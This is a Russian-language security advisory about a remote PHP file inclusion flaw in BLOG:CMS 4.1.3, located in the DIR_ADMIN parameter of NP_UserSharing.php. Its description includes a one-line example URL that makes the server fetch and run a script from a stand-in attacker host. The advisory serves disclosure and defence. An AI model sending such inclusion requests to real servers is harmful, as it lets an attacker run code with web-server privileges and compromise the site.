PHP-инклюдинг в BLOG:CMS

Дата публикации:
18.12.2006
Дата изменения:
24.03.2009
Всего просмотров:
2863
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
BLOG:CMS 4.x
Уязвимые версии: BLOG:CMS 4.1.3, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "DIR_ADMIN" в сценарии admin/plugins/NP_UserSharing.php, если параметр содержит строку "admin". Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[host]/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://evelsite/cmd.txt?admin

URL производителя: blogcms.com

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

или введите имя

CAPTCHA